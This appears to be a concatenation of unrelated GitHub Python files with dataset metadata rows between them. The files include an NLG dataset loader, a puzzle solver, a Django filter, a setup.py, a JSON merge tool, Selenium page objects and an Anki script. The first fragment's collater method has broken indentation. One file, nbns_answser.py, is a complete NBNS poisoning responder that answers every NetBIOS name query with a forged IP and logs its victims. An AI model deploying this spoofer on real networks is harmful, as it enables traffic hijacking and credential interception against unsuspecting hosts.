        source, target = self.dataset[index]
        # Keep the untruncated lowercased reference for evaluation.
        target_str = target.lower()
        source = self.pre_caption(source, max_words=self.max_src_length)
        target = self.pre_caption(target, max_words=self.max_tgt_length)
        # Literal "<unk>" in the raw text would collide with the special
        # token, so rewrite it to a plain word.
        source = source.replace('<unk>', 'unk')
        target = target.replace('<unk>', 'unk')
        src_item = self.encode_text(
            self.prompt.format(source),
            length=self.max_src_length
        )
        tgt_item = self.encode_text('{}'.format(target))
        # Decoder input gets token-level noise (see add_noise_to_tgt);
        # the loss target stays clean.
        noise_tgt_item = self.add_noise_to_tgt(tgt_item.clone(), self.noise_ratio)
        src_item = torch.cat([self.bos_item, src_item, self.eos_item])
        target_item = torch.cat([tgt_item, self.eos_item])
        prev_output_item = torch.cat([self.bos_item, noise_tgt_item])
        example = {
            "source": src_item,
            "target": target_item,
            "prev_output_tokens": prev_output_item,
            "target_str": target_str
        }
        return example
    def add_noise_to_tgt(self, target, p):
        """Replace each target token with probability p by a random token id
        drawn from [4, vocab_size - code_dict_size - num_bins), i.e. the
        plain-text vocabulary range excluding specials, image codes and
        coordinate bins.  Mutates and returns `target`."""
        noise_indices = torch.FloatTensor(target.size(0)).uniform_() < p
        target[noise_indices] = torch.randint(
            4, len(self.src_dict) - self.code_dict_size - self.num_bins, size=(noise_indices.sum(),)
        )
        return target
def collater(self, samples, pad_to_length=None):
"""Merge a list of samples to form a mini-batch.
Args:
samples (List[dict]): samples to collate
Returns:
dict: a mini-batch containing the data of the task
"""
return collate(samples, pad_idx=self.pad, eos_idx=self.eos)
| evdcush/musketeer | data/nlg_data/summary_dataset.py | summary_dataset.py | py | 7,516 | python | en | code | 0 | github-code | 36 |
39013778439 | # https://www.acmicpc.net/problem/1987
# 알파벳
import sys
input = sys.stdin.readline
def bfs(r, c, grid=None, rows=None, cols=None):
    """Length of the longest path of pairwise-distinct letters from (r, c).

    Moves are up/down/left/right; a cell may be entered only if its letter
    does not already occur on the current path (Baekjoon #1987).

    Args:
        r, c: starting cell.
        grid, rows, cols: optional board and its dimensions; when omitted,
            the module-level globals ``arr``, ``R``, ``C`` are used
            (original script behavior).

    Prints the answer (original behavior) and also returns it.
    """
    if grid is None:
        grid, rows, cols = arr, R, C
    # Each state is (row, col, letters-on-path); a set deduplicates states
    # reached by different move orders with the same letter multiset string.
    states = {(r, c, grid[r][c])}
    best = 0
    while states:
        cr, cc, path = states.pop()
        best = max(best, len(path))
        for dr, dc in ((0, 1), (1, 0), (0, -1), (-1, 0)):
            nr, nc = cr + dr, cc + dc
            if 0 <= nr < rows and 0 <= nc < cols and grid[nr][nc] not in path:
                states.add((nr, nc, path + grid[nr][nc]))
    print(best)
    return best
# Read board dimensions and the letter grid from stdin. Each row string
# keeps its trailing newline from readline(); that is harmless because
# bfs only indexes columns < C.
R, C = map(int, input().split())
arr = [input() for _ in range(R)]
bfs(0, 0)
| eomsteve/algo_study | dm/8_week/1987.py | 1987.py | py | 595 | python | en | code | 0 | github-code | 36 |
18198988741 | """Providers filters file."""
from django.db import models
import django_filters
from tersun.common.filters import SearchComboboxBaseFilter
from tersun.providers import models as provider_models
class ProviderFilter(SearchComboboxBaseFilter):
    """Provider filter class.

    Search/combobox filter exposing every ``Provider`` model field.
    """

    class Meta:
        """Meta class for the providers filter."""

        model = provider_models.Provider
        # Filter on all model fields; FileField has no default django-filter
        # mapping, so it is overridden below.
        fields = "__all__"
        filter_overrides = {
            # Treat FileField columns as case-insensitive substring text
            # filters on the stored file path.
            models.FileField: {
                'filter_class': django_filters.CharFilter,
                'extra': lambda f: {
                    'lookup_expr': 'icontains',
                },
            },
        }
69904891626 | from setuptools import setup
# To use a consistent encoding
from codecs import open
from os import path
# Read the long description from the README. Pass an explicit encoding:
# codecs.open (imported above) only decodes when one is given; with
# encoding=None it behaves like the plain built-in open() and falls back
# to the platform default, defeating the point of importing codecs.open.
with open('README.rst', encoding='utf-8') as f:
    long_desc = f.read()

setup(name='glucid',
      version='0.5.0',
      description='Configure the Lucid 8824 AD/DA Audio Interface via \
a Serial Connection',
      url='http://github.com/danmechanic/glucid',
      author='Daniel R Mechanic',
      author_email='dan.mechanic@gmail.com',
      license='GPL V3',
      zip_safe=False,
      # scripts=['bin/glucid','bin/xglucid'],
      entry_points={  # Optional
          'console_scripts': [
              'glucid=glucid.glucid_cli:main',
              'xglucid=glucid.xglucid:main'
          ],
      },
      long_description=long_desc,
      keywords='lucid 8824 audio converter',
      packages=['glucid'],
      # py_modules=['glucid.glucid'],
      python_requires=">=3",
      package_dir={'glucid8824': 'glucid',
                   'xglucid': 'glucid',
                   'Glucid8824_UI': 'glucid',
                   'Glucid8824': 'glucid',
                   'xglucidUIWidgets': 'glucid',
                   },
      long_description_content_type='text/x-rst',
      classifiers=[
          'Development Status :: 3 - Alpha',
          'Programming Language :: Python :: 3',
          'Programming Language :: Python :: 3.2',
          'Programming Language :: Python :: 3.3',
          'Programming Language :: Python :: 3.4',
          'License :: OSI Approved :: GNU General Public License v3 (GPLv3)',
          'Topic :: Multimedia :: Sound/Audio :: Conversion',
          'Topic :: Multimedia :: Sound/Audio :: Capture/Recording',
      ],
      project_urls={
          'Author': 'http://www.danmechanic.com/',
          'Source': 'https://github.com/danmechanic/glucid/',
      },
      install_requires=[
          'PyQt5>=5.9',
          'PySerial',
      ]
      )
| danmechanic/glucid | setup.py | setup.py | py | 1,879 | python | en | code | 1 | github-code | 36 |
43587647307 | import argparse as _argparse
import os as _os
import sys as _sys
from colorama import Fore as _Fore
from colorama import init as _colorama_init
from contexttimer import Timer as _Timer
from src import merge as _merge
from src import parse as _parse
if __name__ == '__main__':
    """
    Example: python merge.py --in pss_api_ios_v0.989.9402_anonymized.json pss_api_steam_v0.991.4_anonymized.json --out examples
    """
    # enable Windows support of colors
    _colorama_init()

    ERR_INPUT_NOT_FOUND = 1

    parser = _argparse.ArgumentParser()
    parser.add_argument('--in', dest='in_', type=str, nargs='+', required=True, help='Path(s) to the flows file(s) to be merged')
    parser.add_argument('--overrides', type=str, required=False, help='Path to the overrides file')
    parser.add_argument('--outfile', type=str, required=True, help='Target file path for the merged flows file')
    parser.add_argument('--uncompressed', action='store_true', help='Preserve whitespace in the output file')
    args = parser.parse_args()

    # Validate every input path up front so the user sees all missing files
    # in one run, then abort before doing any merge work.
    error = False
    for file_path in args.in_:
        if not _os.path.isfile(file_path):
            print(f'{_Fore.RED}ERROR: Specified flows JSON file does not exist: {file_path}{_Fore.RESET}')
            error = True  # BUGFIX: flag was never set, so missing inputs did not abort
    if error:
        _sys.exit(ERR_INPUT_NOT_FOUND)

    with _Timer() as t:
        print(f'{_Fore.YELLOW} >>>{_Fore.RESET} Input files:')
        for in_ in args.in_:
            print(f'{_Fore.YELLOW} >>> -{_Fore.RESET} {in_}')
        print(f'{_Fore.YELLOW} >>>{_Fore.RESET} Output file: {args.outfile}')
        print(f'{_Fore.YELLOW} >>>{_Fore.RESET} Compressed storage: {"No" if args.uncompressed else "Yes"}')

        print(f'{_Fore.BLUE} >>>{_Fore.RESET} Merging parsed flows...')
        # Fold all input structures left-to-right into one merged structure.
        result = _merge.read_structure_json(args.in_[0])
        for merge_with in args.in_[1:]:
            result = _merge.merge_api_structures(
                result,
                _merge.read_structure_json(merge_with)
            )

        if args.overrides:
            overrides = _merge.read_structure_json(args.overrides)
            result = _merge.apply_overrides(result, overrides)

        _parse.store_structure_json(
            args.outfile,
            result,
            (not args.uncompressed)
        )
    print(f'{_Fore.BLUE} >>>{_Fore.RESET} Done in {t.elapsed}s')
    _sys.exit(0)
| PSS-Tools-Development/pss-api-parser | merge.py | merge.py | py | 2,353 | python | en | code | 4 | github-code | 36 |
37722788260 | '''
商品详情页面
'''
from common.base import Base
good_url ='http://ecshop.itsoso.cn/goods.php?id=304'
class Buy_Good(Base):
    """Product-detail page object: locators and actions for the
    'buy now' flow on the ECShop goods page."""

    # --- locators: (By strategy, value) tuples ---
    good_name_loc = ('class name', 'goods_style_name')
    good_brand_loc = ('css selector', 'a[href="brand.php?id=20"]')
    number_loc = ('id', 'number')
    libuy_loc = ('css selector', 'img[src="themes/default/images/buybtn1.png"]')
    collect_loc = ('css selector', 'img[src="themes/default/images/bnt_colles.gif"]')
    share_loc = ('css selector', 'img[src="themes/default/images/bnt_recommend.gif"]')
    price_loc = ('id', 'ECS_RANKPRICE_6')
    front_good_no_loc = ('css selector', 'li.clearfix:nth-child(1)>dd:nth-child(1)')

    def click_brand(self):
        """Open the brand page via the brand link."""
        self.click(self.good_brand_loc)

    def send_number(self, num):
        """Enter the purchase quantity *num* into the quantity box."""
        self.double_click(self.number_loc)
        self.send_keys(self.number_loc, num)
        # Click the price element afterwards — presumably to move focus off
        # the quantity input so the new value takes effect (TODO confirm).
        self.click(self.price_loc)

    def click_libuy(self):
        """Click the 'buy now' button."""
        self.click(self.libuy_loc)

    def click_collect(self):
        """Click the 'add to favourites' button."""
        self.click(self.collect_loc)

    def click_share(self):
        """Click the 'share' button."""
        self.click(self.share_loc)

    def get_good_name(self, locator):
        """Return the visible text of the element found by *locator*."""
        return self.find_element(locator).text

    def get_front_good_no(self):
        """Return the product number (e.g. 'ECS000304') from the detail row.

        The row text contains a full-width colon separating the label from
        the value; everything after it is returned.
        """
        row_text = self.find_element(self.front_good_no_loc).text
        return row_text.split(':')[1]
if __name__ == '__main__':
    # Ad-hoc manual check: open the goods page and read name/product number.
    from common.base import open_browser
    from time import sleep
    driver = open_browser('chrome')
    libuy = Buy_Good(driver)  # instantiate the Buy_Good page object
    libuy.open_url(good_url)
    good_name_loc = ('class name', 'goods_style_name')
    print(libuy.get_good_name(good_name_loc))
    # product number from the front-end detail row
    front_good_no_loc = ('css selector', 'li.clearfix:nth-child(1)>dd:nth-child(1)')
    num =libuy.get_front_good_no()
    print(num)
    # sleep(2)
    # libuy.send_number(3)
    # sleep(3)
    #
    #
    # libuy.click_libuy()
| 15008477526/- | web_aaaaaaaa/page/good_details3.py | good_details3.py | py | 2,403 | python | en | code | 0 | github-code | 36 |
75310098025 | #!python
#/usr/bin/env python
# -*- coding:utf-8 -*-
__doc__ = """
NBNS Answer ,
by Her0in
"""
import socket, struct,binascii
class NBNS_Answer:
    """Answer every NBNS name query with a poisoned response pointing
    at a chosen IP address."""

    def __init__(self, addr):
        # IP address handed out in every poisoned answer.
        self.IPADDR = addr
        self.nas = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
        self.init_socket()
        self.populate()

    def populate(self):
        """Build the raw NBNS answer template.

        The b'TID', b'NAME' and b'IPADDR' markers are patched per
        request in Answser().
        """
        self.AnswerData = (
            b"TID"               # Transaction ID (copied from the query)
            b"\x85\x00"          # Flags
            b"\x00\x00"          # Questions
            b"\x00\x01"          # Answer RRs
            b"\x00\x00"          # Authority RRs
            b"\x00\x00"          # Additional RRs
            b"\x20"              # name length: 32
            b"NAME"              # encoded NetBIOS name (copied from the query)
            b"\x00"              # name terminator
            b"\x00\x21"          # type: NB
            b"\x00\x01"          # class
            b"\x00\x00\x00\xa5"  # TTL
            b"\x00\x06"          # data length
            b"\x00\x00"          # null
            b"IPADDR")           # IP address placeholder

    def init_socket(self):
        """Set address/port and socket options; binding happens in Answser()."""
        self.HOST = "0.0.0.0"
        self.PORT = 137  # NetBIOS Name Service port
        self.nas.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        self.nas.setsockopt(socket.IPPROTO_IP, socket.IP_MULTICAST_TTL, 255)

    def decode_name(self, nbname):
        """Return the NetBIOS first-level decoded nbname.

        Inputs that are not exactly 32 bytes are returned unchanged. Each
        byte pair encodes one character as two nibbles offset by 0x41;
        the decoded string is cut at the first NUL.
        """
        if len(nbname) != 32:
            return nbname
        chars = []
        for i in range(0, 32, 2):
            hi = ((nbname[i]) - 0x41) << 4
            lo = ((nbname[i + 1]) - 0x41) & 0xf
            chars.append(chr(hi | lo))
        return ''.join(chars).split('\x00', 1)[0]

    def Answser(self):
        """Bind the socket and answer every incoming NBNS query forever."""
        self.nas.bind((self.HOST, self.PORT))
        print("Listening...")
        while True:
            data, addr = self.nas.recvfrom(1024)
            # Transaction id and the encoded queried name, echoed back.
            tid = data[0:2]
            name = data[13:45]
            answer = self.AnswerData.replace(b'TID', tid)
            answer = answer.replace(b'NAME', name)
            answer = answer.replace(b'IPADDR', socket.inet_aton(self.IPADDR))
            print("Poisoned answer(%s) sent to %s for name %s " % (self.IPADDR, addr[0], self.decode_name(name)))
            self.nas.sendto(answer, addr)
        self.nas.close()  # NOTE: unreachable (as in the original loop)
if __name__ == "__main__":
nbns = NBNS_Answer("192.168.6.118")
nbns.Answser()
| b40yd/security | nbns_answser.py | nbns_answser.py | py | 2,347 | python | en | code | 96 | github-code | 36 |
8266325142 | import anki
from aqt import mw
import re
# Hard-coded Anki profile path; adjust for your own installation.
col = anki.collection.Collection('C:/Users/clept/AppData/Roaming/Anki2/Iván/collection.anki2')

deck_name = 'Seguridad social test'
search_query = '"deck:' + deck_name + '"'
cards = col.find_cards(search_query)


def _sort_key(back_text):
    """Derive the 'Sort' field value from a card's Back text.

    Extracts the first article/section reference after a '">' anchor —
    e.g. '54.2', '2.b.0', '76' or the literal 'índice' — and normalizes
    it to a zero-padded 'major.minor' string so lexicographic order
    matches numeric order. Returns '9998.99' when nothing matches
    (sorts near the end, just before the index at '9999.99').
    """
    match = re.search(r'\">[a-záéíóú ]*(\d+\.\d+|índice|\d+\.[a-z]\.\d+|\d+)', back_text)
    if match is None:
        # Only the "no reference found" case gets the fallback; the
        # original bare `except:` silently swallowed every error here.
        return '9998.99'
    sort_val = match.group(1)
    if sort_val == 'índice':
        sort_val = '9999'
    # Drop a letter component: '2.b.0' -> '2.0'.
    sort_val = re.sub(r'(\d+)(\.[a-z])(\.\d+)', r'\1\3', sort_val)
    if '.' not in sort_val:
        sort_val += '.99'
    if sort_val[-2] == '.':
        # Zero-pad a single-digit minor part: '54.2' -> '54.02'.
        sort_val = sort_val[:-1] + '0' + sort_val[-1:]
    return sort_val


for card_id in cards:
    # Get the card and its associated note.
    card = col.get_card(card_id)
    note = card.note()
    note['Sort'] = _sort_key(note['Back'])
    note.flush()

# Synchronize the collection to save changes to the Anki database
col.autosave()
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.